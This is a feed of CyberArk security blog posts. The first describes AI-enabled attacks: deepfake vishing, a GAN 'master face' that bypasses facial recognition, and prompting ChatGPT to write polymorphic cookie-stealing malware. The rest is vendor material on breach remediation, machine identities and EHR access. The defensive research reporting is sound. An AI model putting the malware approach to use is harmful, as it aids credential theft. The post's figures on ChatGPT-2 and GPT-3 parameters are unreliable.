  • The EU urged tech firms to “clearly label” any services with a potential to disseminate AI-generated disinformation.

As part of the broader cybersecurity research community, CyberArk Labs is focused on this evolving threat landscape to better understand what emerging AI attack vectors mean for identity security programs and help shape new defensive innovations.

I presented highlights from our latest threat research at CyberArk IMPACT23 in Boston, including the three attack scenarios highlighted below. As you’ll see, AI is changing the offensive game in several ways, but not all of them. Nearly every attack continues to follow a familiar progression, as outlined in the MITRE ATT&CK Matrix for Enterprise illustrated here, leaning heavily on identity compromise and high-sensitivity access:

A common attack chain

A common attack chain following 14 tactics defined by the MITRE ATT&CK Matrix for Enterprise

Offensive AI Scenario 1: Vishing

As a conscientious employee, you’ve become very skeptical of phishing emails and know what to look out for. But imagine you’re sitting at your desk and receive a WhatsApp message from the CEO of your company asking you to transfer money right away. You see his avatar and hear his distinct voice on the message. It’s a little strange since you’ve never communicated with him this way, but you ask him where you should send the funds and he responds immediately with all the necessary details. It must be him, right?

Not so fast. AI text-to-speech models make it easy for attackers to mine publicly available information, such as CEO media interviews, and use it to impersonate company executives, celebrities and even U.S. presidents. By building trust with their target, attackers can obtain access to credentials and other sensitive information. Now imagine how such a vishing campaign could be done at scale using automated, real-time generation of text and text-to-voice models.

Such AI-based deep fakes are already commonplace and can be very difficult to spot. AI experts predict that AI-generated content will eventually be indistinguishable from human-created content – which is troubling for cybersecurity professionals and everyone else.

Offensive AI Scenario 2: Biometric Authentication

Now let’s switch gears from attacks on the ears to attacks on the eyes. Facial recognition is a popular biometric authentication option for accessing devices and infrastructure. It can also be duped by threat actors using generative AI to compromise identities and gain an initial foothold in an environment.

In one remarkable study, threat researchers at Tel Aviv University created a “master face” (or “master key”) that could be used to bypass most facial recognition systems. They used an AI model called GANs – or Generative Adversarial Networks – to iteratively test and optimize a vector image to match facial images housed in a large, open repository. Their research produced a set of nine images that matched more than 60% of the faces in the database, meaning an attacker would have a 60% chance of successfully bypassing facial recognition authentication to compromise an identity.

Our CyberArk Labs team built on this theoretical research to demonstrate how attackers could actually bypass facial recognition authentication. Check it out:

 

CyberArk Labs demonstrates an attack using generative AI to bypass facial recognition authentication

Generative AI models have been around for years – so why so much buzz right now? In a word, scale. Today’s models can learn at incredible scale. Consider that ChatGPT-2 could digest “just” 3 billion parameters (variables in an AI system whose values are adjusted to establish how input data gets transformed into the desired output). The latest version, GPT-3, can digest 100x more parameters than that. This exponential growth in parameters is directly connected to advances in cloud computing and new, perimeter-less environments that define our digital era. As AI models continue to learn, they’ll continue to get better at creating realistic deep fakes, malware and other risky threats that will change the landscape.

Offensive AI Scenario 3: Polymorphic Malware

Many researchers and developers are experimenting with generative AI to write all kinds of code – including malware. For offensive campaigns, AI can be incredibly effective during the earliest stages of the attack chain, such as reconnaissance, malware development and initial access. However, it is not yet clear that AI TTPs (tactics, techniques and procedures) are useful after an attacker is inside and working to escalate privileges, access credentials and move laterally. These three stages all hinge on identity compromise, underscoring the importance of robust intelligent identity security controls in protecting critical systems and data.

Based on our research, CyberArk Labs sees a new AI-fueled technique that could be categorized under MITRE’s defense evasion stage: polymorphic malware and continue to analyze this area closely.

Offensive AI techniques mapped to the MITRE ATT&CK Matrix for Enterprise

Offensive AI techniques mapped to the MITRE ATT&CK Matrix for Enterprise

Polymorphic malware mutates its implementation while keeping its original functionality intact. Until recently, malware was defined as “polymorphic” if it changed how it encrypted its various modules (this makes it especially difficult for defenders to identify the malware). After generative AI introduced the possibility of mutating or generating code modules with different implementations, our team quickly began experimenting with ChatGPT to create polymorphic malware. Not because it’s a great way to create code (it’s not), but because it’s so accessible and fun …

We asked ChatGPT to generate an info-stealer – a type of malware that fetches session cookies once it’s executed on disk. You can check out all the code and technical details in our Threat Research blog post, “Chatting Our Way Into Creating a Polymorphic Malware,” but here are our high-level takeaways: ChatGPT is an enthusiastic, yet naïve, developer. It writes code quickly but misses critical details and context. During our experiment, the chatbot created a hard-coded password and tried to use it to decrypt session cookies – a huge security red flag that made us wonder where it learned this risky (and unfortunately, very common) practice.

Ultimately, we found that defense evasion using AI-generated polymorphic malware is viable. For example, an attacker could use ChatGPT to generate (and continuously mutate) information-stealing code for injection. By infecting an endpoint device and targeting identities – locally stored session cookies, in our research – they could impersonate the device user, bypass security defenses and access target systems while staying under the radar. As AI models improve and attackers continue to innovate, automated identity-based attacks like these will become part of malware operations.

Countering Attack Innovation with AI-Powered Defense

We can take away three things from these attack scenarios:

  1. AI already has and will continue to impact the threat landscape in many ways – from how security weaknesses are found to how malicious code is developed. It presents threat actors with new opportunities to target identities and even bypass authentication mechanisms. And it won’t take long for AI to hone its skills.
  2. Identities remain prime attack targets. Identity compromise continues to be the most effective and efficient way for attackers to move through environments and reach sensitive systems and data.
  3. Malware-agnostic defenses are even more critical. Security layers must evolve to not only quarantine malicious activity, but also enforce preventive practices, such as least privilege access or conditional access to local resources (like cookie stores) and network resources (like web applications).

As our AI-focused threat research continues, it’s important to remember that AI is also an incredibly powerful tool for cyber defenders. It will be key to countering change in the threat landscape, improving agility and helping organizations stay one step ahead of attackers. It also represents a promising new chapter where cybersecurity deployments are simpler, highly automated and more impactful. By harnessing AI to optimize security boundaries where they’re needed most – around human and non-human identities – organizations can effectively mitigate threats today and in the future.

Editor’s note: To learn more about the ever-expanding attack surface, attacker techniques and trends in identity-based cyberattacks, join CyberArk on the Impact World Tour in a city near you.

Lavi Lazarovitz is vice president of cyber research at CyberArk Labs.

]]>
Cyber Breach Remediation’s 5-Step Cycle https://www.cyberark.com/blog/cyber-breach-remediations-5-step-cycle/ Thu, 01 Jun 2023 06:38:13 +0000 https://www.cyberark.com/?p=145193 cyber breach remediation's5 step cycle

Organizations tend to fall into two categories: those that have been breached and those that don’t yet realize they’ve been breached.

If you belong to the first group, believe it or not, you’re in luck. Once the breach has been acknowledged, your organization is closer to fixing the problem and overcoming the damage. You can use your existing tools and onboard new ones like systems isolation, multi-factor authentication (MFA) and least privilege on endpoints to start the remediation process as soon as possible.

If you fall into the second group, you’re either not aware of a breach or you might know you don’t have the proper controls in place to mitigate one. For these organizations, it’s time to build an extended identity security program from the foundation of protecting the most privileged accounts and users. Advanced privileged access management (PAM) solutions can significantly reduce the risk of human error when accessing privileged accounts and sensitive environments or data. These tools can help remediate and prevent breaches caused by compromised credentials.

Organizations are increasingly realizing that no one is immune to security breaches. In a recent CyberArk survey, 92% of global organizations indicated identity security is critical for a robust Zero Trust implementation. But how should these organizations tackle the challenge of staying ahead of attackers while always assuming breach and adopting a Zero Trust mindset? Enter breach remediation – a cyclical, never-ending process that, when done properly, helps organizations improve after every incident and can significantly reduce damages and subsequent risks to their environments.

Breach Remediation in Five Steps

There are five steps in the breach remediation cycle:

Step 1: Identify Vulnerabilities

Once your security team discovers an internal breach, it’s time to jump into action. The team must first determine the status of the attack and its origin. It also needs to identify the vulnerability that the intruder used to gain access and track their actions. Popular attack patterns tend to change from time to time, but most frequently, threat actors sink their hooks into someone on the inside who is unaware of the risks of the actions (or inactions) that allowed access to systems and data.

Common examples of these actions include internal employees not using multi-factor authentication (MFA) or endpoint controls, running untrusted applications and sharing credentials.

Step 2: Investigate the Breach in Its Entirety

While it’s critical first to identify the point of attack, you must then dig deeper to better understand the complete picture. This is where an internal incident response team or external advisory should come in. The team reviews the forensic findings and data to track the breach path. Incident responders seek information about compromised controls or identities and exploited vulnerabilities.

Piece together as many details as you can early on with the remediation team to help inform your remediation strategy. Correlating data from systems, accounts and users will allow you to understand the attack and how it affects your organization.

Ask focused questions: What data was exposed? Is the attack still happening?

Step 3: Take Action to Repair the Situation

Once you’ve gathered your facts, you need to decide what action to take immediately. This step is the most challenging part of the breach remediation process, and the correct choice will vary depending on the situation. Just as breaches differ, so do remediation actions.

For example, you may decide to disclose the incident publicly or take down the compromised service – or both. Whatever you decide to do, you must consider any impact the actions will have on your customers and internal users. And you also need to be mindful of the financial consequences of your post-breach actions and how they may affect the extent of the damage to your organization and its reputation.

“During remediation, being informed, having the right tools and understanding how to implement controls is critical, but as importantly, you should always consider the part played by the people in the situation.”—CyberArk Senior Security Consultant Aaron Fletcher

Step 4: Collaborate With a Remediation Team

Now that you’ve decided on a path forward, it’s crucial to collaborate with subject matter experts like a remediation team. They can assist in regaining control of your environment and evaluating the hygiene of your existing identity security tools and policies – and, if needed, onboarding new ones that suit your organization’s needs. Working with an experienced remediation team can help you contain a breach, identify any gaps that attackers may exploit and implement tools like MFA or session isolation. With support from a remediation team, you can eventually eradicate the breach and enforce new, stricter access policies within your environment.

The third benefit of collaborating with a remediation team is recovery. The team can help ensure that the new tools and policies work as planned.

Then, once the risk is contained, it’s time to look back at everything – from understanding what happened that allowed the breach to occur to what your organization could have done better in responding to it. You can better prepare for future incidents when you and your team acknowledge and understand any mistakes and necessary improvements to your response.

Step 5: Prepare for the Next Security Event

Preparing and responding to security threats and breaches is cyclical. You prepare and defend, tackle the incident, learn from it – and then prepare again. And preparation is always the first and the last stage of the cycle. With each new cycle, you learn and work to improve your security posture. After an incident, teams should return to the drawing board to further develop their identity security strategy and PAM program.

And don’t forget your employees. A full post-breach recovery requires considerable effort from your internal teams, and you must set them up to succeed. While onboarding new services is an important first step, coaching and educating your employees is crucial for being perpetually prepared for cyber threats.

Golden Rules for Successful Breach Remediation

Cybersecurity often feels like a numbers game, where professionals focus most on preventing and stopping attacks. But defenses can always be breached – and in today’s threat landscape, that probability is increasing.

When considering your own comprehensive, ongoing breach remediation plan, keep these essentials top of mind:

  • Understand the sensitivity of what you’re trying to protect and the privileged access provided to those protected resources. Always be mindful of human involvement in any change in process or implementation of identity security controls, policies or strategies.
  • Train and educate your end users. Invest in informing internal teams of upcoming changes and start preparing them as early as possible. You should enable your employees with the right tools and assistance to learn how to protect themselves and your organization while working in secure environments and accessing organizational assets.
  • Implement the right identity security tools. Among others, PAM, MFA and endpoint controls at the right time can help increase security significantly and reduce the risk of an attack.

With a solid breach remediation strategy, your organization will be more likely to respond quickly to a breach, limit the damage and rapidly regain control.

Lilach Faerman Koren is a product marketing manager at CyberArk.

]]>
Battling the Three Forces of Identity Security at IMPACT23 https://www.cyberark.com/blog/battling-the-three-forces-of-identity-security-at-impact23/ Thu, 25 May 2023 13:17:44 +0000 https://www.cyberark.com/?p=145075

Identity security: it’s a battle being waged on three fronts – and a rallying point for global cybersecurity professionals attending CyberArk IMPACT23, the identity security event of the year, held this week in Boston.

While intelligent privilege controls remain the critical foundation for securing access across organizations, today’s challenges have grown more complex thanks to three driving forces:

1.  New identities
2.  New environments
3.  New attack methods

With 84% of organizations experiencing an identity-related breach in the past year, the ability to build business resiliency depends on meeting these three challenges head-on. With this urgency top-of-mind, IMPACT speakers and panelists – including CyberArk customers and partners – explained how to meet those challenges, drawing from their firsthand experiences and diving into identity security trends.

From cutting-edge research on how generative AI can be used to create polymorphic malware to exciting announcements about how CyberArk is securing the most-used application of all – the browser – there were plenty of key insights and exciting real-world examples shared.

Now, with IMPACT just wrapped after a busy three days of energizing keynotes, panels and breakout sessions (plus all those nightly networking gatherings), the following are our initial reflections on some top highlights from the past few days.

New Identities

Distributed workforces, third-party users and the surge of machine identities have led to identity sprawl like we’ve never seen before. Today’s security leaders must protect hundreds of thousands of identities – human and machine – on a daily basis, from external contractors developing applications to robotic process automation bots performing formerly manual tasks.

All of these identities are key contributors to organizations’ cloud and digital initiatives. The trouble is, they often have far more access to sensitive resources than they need. It’s not just the IT admins of the world who need our protection – it’s every identity that comes into contact with an enterprise’s data, infrastructure and environments.

As identities proliferate, our industry must evolve to meet the challenge. CyberArk experts discussed ways security teams can ensure least privilege for every form of identity by leveraging automation, machine learning and controls typically reserved for privileged users, such as enterprise-grade password protection, session protection and just-in-time capabilities.

CyberArk also revealed some significant new innovations from the CyberArk Identity Security Platform that are helping to lead the charge – including automation and artificial intelligence.

New Environments

It’s not just the identities that are getting more complex to manage. As CyberArk CEO Matt Cohen said in his opening keynote, “No longer are we living in the walled garden of the on-prem data center.” In fact, in a recent CyberArk survey, respondents highlighted that they are already using three or more cloud service providers (CSPs).

CyberArk CEO Matt Cohen delivers his opening keynote
CyberArk CEO Matt Cohen delivers his opening keynote.

Not only does the number of environments pose a challenge for security teams – but also the sheer intricacy. In the cloud breakout sessions, our experts highlighted that there are four layers to consider when it comes to cloud security:

  • Securing high-risk access to third-party SaaS applications.
  • Securing access for lift-and-shift workloads running in virtual machines (VMs).
  • Securing access for workloads on cloud infrastructure (IaaS).
  • Securing access, controls and experience for CSP services in the cloud.

Our speakers also brought up the balancing act security teams must maintain when it comes to enabling innovation in these new environments. Many of the IMPACT sessions emphasized that security must meet developers where they are, creating a seamless experience that enables the devs to do what they do best while still securing the environments they work in. That means moving beyond simple standing access into more dynamic and ephemeral access policies such as just-in-time access and Zero Standing Privileges.

New Attack Methods

During Tuesday’s keynote session, CyberArk Founder and Executive Chairman Udi Mokady reminded the audience that companies aren’t the only ones innovating. Today’s attackers employ a business innovation mindset and are constantly upping their game. Intermittent encryption and a new attack group’s weaponization of Discord to spread malware were just two examples of the combination of business and attack innovation our CyberArk Labs team is seeing today.

CyberArk Founder and Executive Chairman Udi Mokady addresses attacker innovation and the threat landscape
CyberArk Founder and Executive Chairman Udi Mokady addresses attacker innovation and the threat landscape.

Software supply chain attacks also continue to be a hot topic of discussion. Multiple breakout sessions covered the importance of taking a holistic approach to securing CI/CD pipelines to combat new attacker innovations. Mokady also brought up the specter of what we’ve dubbed a “cascading software supply chain attack,” like what was seen in the 3CX attack, in which attackers gained a foothold in the popular VoIP desktop tool through a user who had been a victim of a software supply chain attack on the now-unmanaged trading platform X_Trader.

VP of Cyber Research and the head of CyberArk Research Labs, Lavi Lazarovitz showed attendees just how sophisticated attackers can get when using generative AI. After demonstrating a spooky deepfake of Mokady and how it could be used in a vishing attack – the voice version of phishing – Lazarovitz emphasized that the distance from creating these types of deepfakes to gaining access to sensitive information or credentials is short. He also touched on how biometric authentication could be hacked using generative AI, referencing chilling research from Tel Aviv University on creating a master key to unlock facial recognition protocols. Finally, he showcased how the CyberArk Labs team was able to use ChatGPT to generate code for a type of malware that attackers could use to harvest valuable credentials and sensitive information.

CyberArk Labs’ Lavi Lazarovitz
CyberArk Labs’ Lavi Lazarovitz discusses attacker innovation through generative AI.

We also got a glimpse into how attackers innovate and think from the firsthand experiences of Marcus Hutchins, who shared his story of how he made the journey from developing malware as a young hacker to halting the 2017 WannaCry attack. He delivered it from the unique perspective of a former malware author now fighting on the side of cybersecurity defenders. One of his biggest cautions looking at the threat landscape today had to do with how credentials are now often harvested by malware but not immediately used. Instead, they’re sold on again and again, meaning that it could be years before they’re used to break into the target organization.

CyberArk Labs’ Andy Thompson interviewing Marcus Hutchins
CyberArk Labs’ Andy Thompson interviews Marcus Hutchins.

And that brings us to one of the biggest attack vectors of interest at IMPACT23: cookie or session hijacking. Using this method, attackers gain control of a user’s session and gather important information (like cookies) that can then be used to further penetrate the network. CircleCI and Linus Tech Tips are just two of the most recent breaches tied to session hijacking, but as our CyberArk Labs team has shown, cookies and session IDs can be stolen with ease and are highly valuable to attackers. Across the breakouts, IMPACT speakers illustrated the risks around current browser usage and how easily cookies can be stolen and used to gain access to critical systems. There is an obvious need for a secure browser that can protect cookies and data while still providing a seamless user experience.

New Innovations

As Mokady emphasized in his keynote, a foundational piece of CyberArk’s constitution is to “combat attacker innovation with innovation,” staying one step ahead of these cutting-edge attack methods. Throughout the breakout sessions and keynotes, our experts offered clear strategies on how to mitigate identity-based attacks with the help of CyberArk.

Though there were many new CyberArk capabilities revealed – which we touched on above – the marquee IMPACT23 announcement focused on the new CyberArk Secure Browser. Part of the CyberArk Identity Security Platform, the Chromium-based CyberArk Secure Browser supports enterprise Zero Trust initiatives with integrated security, centralized policy management and productivity tools while delivering a familiar user experience. By extending the CyberArk Identity Security Platform to the browser itself, CyberArk makes it easy for IT teams to tailor security, privacy and productivity controls on managed and unmanaged devices. CyberArk Secure Browser offers cookieless browsing to allow users to access and use web-based resources without exposing cookie files to attackers.

Thank you to all our customers and partners for being with us on this identity security journey, and welcome to those who have joined us this week at IMPACT23 as we continue to work together on all three fronts – because the future of security is identity.

]]>
The Seven Types of Non-human Identities to Secure https://www.cyberark.com/blog/the-seven-types-of-non-human-identities-to-secure/ Tue, 16 May 2023 13:40:47 +0000 https://www.cyberark.com/?p=144140 Non human identies types

Non-humans are everywhere these days. Sure, you’ve seen the much-deserved hype about how AI-powered tools like ChatGPT are going to change everything. But there are plenty of more mundane non-human entities that you interact with in your daily life: the smart thermostat program that knows to cool down your house at a certain time every day, the application on your phone that suggests directions to a place you’ve searched for, and many others. Non-human identities pervade every aspect of our lives, both personally and professionally.

In fact, machine identities outweigh human identities by a factor of 45 to one, according to CyberArk research. Machine identities like bots in robotic process automation (RPA) workloads and microservices running in the cloud are growing at an exponential pace as more companies transform digitally. They’re automating many formerly mundane tasks and increasing many functions’ operational efficiency. These non-human identities rely on secrets (including passwords, SSH keys and API keys) to access critical resources and do their jobs. And those secrets need to be secured, just as privileged credentials for humans do.

There are likely several areas across your organization that house non-human identities using secrets that need to be managed and secured. Below, we walk through seven types of the most common non-human identities you may find in your organization and some security challenges for each type when it comes to secrets management. Understanding these challenges (and seeing how different they can be for each identity type) is the first step to building a cohesive plan on how to mitigate them.

1. Cloud Environments and Cloud-Native Apps

Many organizations use multiple cloud service providers (CSPs) to maintain pricing control, enable flexibility and avoid cloud vendor lock-in. Each CSP has their own method for storing, accessing and managing secrets. Additionally, cloud-native applications built in these platforms are continually updated using CI/CD processes and often use secrets to communicate with other microservices in the cloud environment to run. The main issue to address when it comes to the cloud is ensuring your security is as flexible and dynamic as the environment your developers are working in.

Security Challenges:

  • Developers need to be able to work dynamically and at scale.
  • Developers can take shortcuts (i.e., hard coding secrets) or skip over security requirements.
  • Compliance roadblocks can be created from not meeting corporate security requirements.
  • Underlying DevOps tools and container platforms can lack security.
  • Code repositories can accidentally expose secrets and cloud access keys (see the AstraZeneca breach, where access to sensitive patient data was exposed through a credential on GitHub).

2. DevOps Tools, CI/CD Pipelines and the Software Supply Chain

DevOps tools typically require a high level of privileged access to perform their tasks. Thus, CI/CD pipelines and other DevOps tools are known as “Tier Zero” assets, meaning if an attacker gains access to these assets, they can then access more privileged credentials. The software development lifecycle moves fast, and the tools used within it can become a big vulnerability if your DevOps teams aren’t fully aware of necessary security measures.

Security Challenges:

  • Security has to shift left to be involved earlier in the development cycle.
  • DevOps admins and developers may choose to use built-in secrets management functions, contributing to secrets or vault sprawl.
  • Human checks and balances may need to be forced.
  • An attacker may be able to escalate access once a tool is compromised (see the CircleCI breach).

3. Automation Tools and Scripts

Automation tools and scripts can be powerful and perform complex IT and other related tasks. But they can also be very simple, such as a basic PowerShell script used infrequently. While these simple scripts may not jump out as being a large vulnerability, these automation tools and scripts often require high levels of privileged access and have been responsible for some high-profile breaches in the past.

Security Challenges:

  • Too often scripts use embedded hard-coded credentials and can be posted to repositories.
  • Scripts may be overlooked as a security vulnerability because of their simplicity.
  • Ease of replicating and infrequent use make scripts hard to track.
  • Some automation tools have built-in (native) secrets management capabilities that can lead to secrets sprawl and vault sprawl.
  • Attackers can still exploit high-value credentials even if the tool is basic (see the 2022 Uber breach).

4. COTS and ISV Applications

Commercial-off-the-shelf (COTS) and independent software vendor (ISV) applications both require a high level of privileged access to do their jobs. Because these apps aren’t owned by your company, they have some unique security needs that should be addressed, including ensuring that they are integrated with your security tools.

Security Challenges:

  • These apps require vendor-developed integrations.
  • They are vulnerable to weaknesses in the vendor’s software supply chain and CI/CD processes.
  • High levels of access mean there is a high level of exposure if they are compromised by an attacker.
  • Personal information stored in business applications could be exposed in a data breach.
  • Least privilege and just-in-time access are imperative to reduce risk.

5. Robotic Process Automation (RPA) Workloads

RPA bots help development and operations teams (and other “citizen developers”) automate many formerly mundane tasks, speeding up workflows. But manual credential rotations for these bots do not scale, especially when an organization is using a large number of unattended bots without a human supervisor. The biggest challenge for security teams is the need to ensure that they are enabling RPA velocity while also centrally managing policies to stay compliant and defend against attacks.

Security Challenges:

  • Manual rotation and management processes don’t scale.
  • Security can be seen as a blocker to deployment or operational efficiency requirements.
  • Security wants easy-to-use integrations to minimize security issues and speed up deployment.

6. N-Tier/Static Homegrown Applications

While many of the above applications harness newer digital innovations such as the cloud and automation, most organizations still depend on a variety of internally developed applications. These applications include a variety of traditional environments (such as Java) and operating systems, including Unix/Linux, and because they are hosted on-premises, they can pose some different challenges to the other types of identities.

Security Challenges:

  • Credentials are hard coded or locally stored, introducing risk if compromised.
  • Automatic rotation is sometimes not possible for the credentials used by these apps.
  • Access rights need to be better tailored, as these apps can be over-permissioned.
  • They need to easily connect to other systems and applications.

7. Mainframe Applications

Like N-tier applications, applications hosted on mainframes (such as zOS) are still widely used by enterprises for specific use cases. These are the most mission-critical applications an enterprise has, and it’s vital that these applications do not experience outages or have their processes interrupted by security procedures.

Security Challenges:

  • Credential rotation can potentially interrupt high-volume transactions.
  • Credentials are hard coded or locally stored, introducing risk if compromised.
  • High levels of reliability are required.

So How Do You Keep Track of It All?

You can see how overwhelming secrets management can get when you’re working with a large number and variety of non-human identities. Each group has its own nuances and stakeholders that need to be considered when creating security policies. Being aware of all the different identity types in your organization and understanding all the different security needs that must be considered are the first steps to building a cohesive program to manage and secure these identities and the secrets they use.

That’s where centralizing secrets management can help. Our eBook “Key Considerations for Securing Different Types of Non-human Identities” walks you through best practices for securing secrets in each of these categories. It also provides a phased approach on how you can build a more effective secrets management program.

Kristen Bickerstaff is a senior content marketing manager at CyberArk.

]]>
Overcoming Healthcare EHR Access Hurdles https://www.cyberark.com/blog/overcoming-healthcare-ehr-access-hurdles/ Fri, 12 May 2023 14:25:27 +0000 https://www.cyberark.com/?p=144007 Hand of doctor using laptop and tablet. Intended to depict EHR access.

Healthcare cyberattacks are increasing in “frequency, severity and sophistication,” said Nitin Natarajan, U.S. Cybersecurity and Infrastructure Security Agency (CISA) deputy director, in his recent HIMSS23 Healthcare Cybersecurity Forum keynote. Attacks on hospitals have surged by 86% since 2021, with the average healthcare organization experiencing two or more ransomware attacks in the past year. “And this is going to continue to increase,” Natarajan warned.

Staying one step ahead of “well-funded” and “capable” adversaries requires vigilance and collaboration – as well as a close look at electronic health record systems (EHRs), the heart of modern healthcare IT. Because EHRs contain electronic medical records (EMRs) – essentially, digitized patient medical charts – EHRs are top targets for healthcare cyberattacks.

Healthcare Transformation, the Electronic Health Record Era and Rising Cybersecurity Risk

Many organizations adopted EHR systems as part of digital transformation pushes to curb inefficiencies and facilitate data sharing. According to HIPPA Journal, 57% of healthcare workers say their job has become more digitized over the past two years. While digitization improves many processes and experiences, it also tends to complicate IT systems. When system A won’t “talk” to system B, clinicians can waste valuable time piecing together patient medical history, medication allergies, comorbidities and more.

Transformation projects can also create security gaps, driving up risk and cybersecurity debt. Security professionals across industries overwhelmingly (79%) agree that security lags behind IT and digital initiative investments, according to the CyberArk 2022 Identity Security Threat Landscape Report. Meanwhile, a 2022 Ponemon Institute study revealed that 89% of healthcare organizations experienced a cyberattack in the past year, negatively impacting patient outcomes for 57% of surveyed organizations.

The same CyberArk report identified privilege escalation as the number one attack vector of risk for healthcare organizations. By stealing credentials via phishing, social engineering or other techniques, threat actors can compromise or abuse identities, assess a healthcare IT environment and escalate privileges to reach their goal: stealing EMRs or holding them for ransom. According to the U.S. Department of Health and Human Services, protected health information (PHI) found within EMRs gives criminals more details than any other record, making healthcare data the most valuable on the dark web.

Simplifying EHR Authentication Workflows to Improve Healthcare Outcomes

On the flip side, for defenders, healthcare data confidentiality, integrity and availability are more important than ever. To achieve these goals, multi-factor authentication (MFA) is a crucial security layer.

Most healthcare organizations already have a two- or multi-factor authentication method in place due to regulatory compliance requirements. For example, U.S.-based clinicians must go through MFA before prescribing or approving prescriptions for opioids and other controlled substances. Yet not all MFA is created equal, and many organizations use insecure methods that put EHR systems and patient data at risk. A newly released HIMSS Cybersecurity Study reveals that 57.23% of healthcare organizations still use basic usernames and passwords and 58.49% use traditional SMS-based authentication (notorious for facilitating SIM-swapping attacks), while just 9.43% use phishing-resistant (or passwordless) MFA factors, such as a FIDO, QR codes, biometrics or physical tokens.

HIMSS survey authors call for more robust authentication measures, writing, “Healthcare needs to adopt passwordless multi-factor authentication as too many compromises happen nowadays involving passwords with as many as 921 passwords compromised each second.”

Security isn’t the only factor in play. Usability is just as important for hard-working healthcare workers. Constantly re-authenticating into EHR systems to access patients’ EMRs, enter health information and complete prescriptions is not only time-consuming, it’s distracting. In fact, many clinicians report negative EHR-related experiences. According to a recent Annals of Family Medicine study, 79% of clinicians say they maintain less eye contact when using an EHR system, 53% say they listen less carefully and 62% say EHR use makes patient visits less personal. Back-to-back patient visits leave clinicians little time for follow-up, yet many can’t securely access patient records outside the hospital network or from outside devices.

Also of particular interest, the same study found that most patients view EHR systems positively (91%). This suggests that many EHR challenges could be solved by making clinicians’ lives easier — for instance, by giving clinicians access to everything they need within an EHR with single sign-on (SSO). U.S. Surgeon General Vivek Murthy agrees. In a recent advisory, he urged organizations to “optimize technology to increase time spent between health workers and patients.” He outlined specific examples such as “simplifying EHR-based workflows and addressing patient and health worker usability issues with virtual care.”

Healthcare professionals shoulder an enormous burden. Suffering from severe workforce shortages and burnout, they are leaving the industry in droves. The World Health Organization estimates a global shortfall of 10 million health workers by 2030. Lightening clinicians’ workloads in every way possible is imperative. Our health — and the future of our healthcare systems — depends on it.

Lee Godby is a director of business development at CyberArk.

]]>
Bad Droid! How Shoddy Machine Security Can Topple Empires https://www.cyberark.com/blog/bad-droid-how-shoddy-machine-security-can-topple-empires/ Thu, 04 May 2023 09:02:56 +0000 https://www.cyberark.com/?p=143578

The need for strong identity security protocols for humans has been a given for years. Your organization likely has multiple layers of controls to ensure that access to sensitive assets is limited to those that need it. But a certain large, global (well…multi-global) organization that comes to mind on this May the Fourth also had layers of human identity controls that adhered to the principles of least privilege.

And yet a small, scrappy group of attackers exploited their security protocols, exfiltrated their most sensitive data and destroyed the empire – er, organization – from within its own network. How did this happen?

Machine identity security is just as crucial, if not more so, to organizations defending against the rise of identity-based cyberattacks. After all, machine identities now outweigh human ones in your average organization by a factor of 45x, according to CyberArk research. So how do you make sure those are secure too? Let’s take a look at what happened to this fictitious organization – we’ll call them Empire Inc.

Human Identity Security Is All Well and Good…

Like many organizations, Empire Inc. had multiple layers of human identity security controls, some of which were built into their…employees’ uniforms.

The first were something that Empire Inc. called “code cylinders,” but you could think of them similar to privileged account credentials. Some employees, those who required lower privileged access, only had one, while those higher up in the organization could have access to several. These credentials uniquely identified each user with their personal security code and clearance level, providing authentication. Each sector of the organization also required a different code cylinder, ensuring there was a separation of duties that prevented potential conflicts of interest or fraud by reducing the damage any one individual could do beyond their job scope. Finally, these credentials provided session monitoring and a detailed audit trail of each user’s activity, including real-time reporting of suspicious behavior and unnecessary access to sensitive files and resources.

Rank insignia plaques also signified each employee’s role, enabling Empire Inc. to provide granular access control and authorization based on the user’s role, known as role-based access controls (RBAC).

All of these security measures did a great job of enforcing the principle of least privilege when it came to the human employees of Empire Inc.

But You Can’t Forget Your Non-human Identities

Empire Inc. made one big mistake, however. While they had an iron-fisted grip on human identity and access control, they completely forgot about the machines that also had access to their environments and systems. And even when they did acknowledge their machine identities, they wrongly assumed that the droids couldn’t cause any real harm to such a large organization.

Early on in the attack — which spanned several months as the threat actors diligently worked their way through Empire Inc.’s layers of security — one machine gained highly privileged access and was allowed to exfiltrate sensitive data that it had stolen to pass it along to its human allies. The security controls spotted the exfiltration but shockingly let the machine — we’ll call him “ArrToo” — go as they didn’t detect any “lifeforms” involved. By not applying the same strict controls it had for human employees when it came to granting access and auditing user activity, Empire Inc. left a giant hole in its security defense.

From there, the attackers continued to exploit Empire Inc.’s ignorance of the power machine identities could wield. Because of Empire Inc.’s lack of proper authentication protocols for machine identities (which they had for humans), ArrToo was able to gain access to every environment within the organization, as well as all of the resources within it, without an authorization check catching him. Locks were meaningless to ArrToo, who bypassed them with ease and exfiltrated additional data from Empire Inc. Eventually, ArrToo’s activities, unmonitored by the security team at Empire Inc., allowed its human allies to launch a successful attack against Empire Inc. and bring down their entire network.

Zero Trust: Adopt an “Assume Breach” Mindset

Let’s try and give Empire Inc. the benefit of the doubt. Perhaps they knew a rogue machine like ArrToo would be able to bypass much of their security controls, hence why they refused to allow machines access to many places in their organization. Their focus was mainly on keeping threat actors from breaching their perimeter. The problem with this approach, however, is that it allowed the attackers to turn a small breach into a much larger disaster.

zero trust assume breach

Instead, faced with constant cybersecurity threats, enterprises need to focus on what they can control to mitigate their risk and potential exposure. Because there is no longer a well-defined IT perimeter, the threat landscape is now asymmetric, making a Zero Trust security mindset essential. Protecting non-human identities and the secrets that they have access to — which can grant them high levels of privileged access to multiple sensitive resources — is critical to defending against the next attack. Organizations need to assume that they’ve already been breached and build layers of security to ensure both human and non-human identities have the right amount of access.

Security teams need to holistically manage access across the entire enterprise without silos or blind spots, with the ability to automatically rotate credentials as needed. A centralized secrets management system is the best option for authenticating, authorizing and auditing non-human access because it allows organizations to fully understand who has access to what and to automatically rotate or revoke access as needed.

To learn more about how secrets management can help secure non-human identities (and for some more fun discussion on Empire Inc. and the scrappy attackers that brought them down), join me for our webinar, “Are These The Droids You’re Looking For – Bringing Balance to Application Identities.”

And May the Fourth be with you!

John Walsh is a senior product marketing manager at CyberArk.

]]>
Assess Insider Threats by Asking 6 Key Questions https://www.cyberark.com/blog/assess-insider-threats-by-asking-6-key-questions/ Mon, 01 May 2023 15:37:24 +0000 https://www.cyberark.com/?p=143479 Assess Insider Threats by Asking 6 Key Questions

The people closest to your business can sometimes cause the most damage. Yet while top-secret data leaks are headline news today, most insider threats are well-intentioned people who just screw up.

Humans: The Weakest Cybersecurity Link

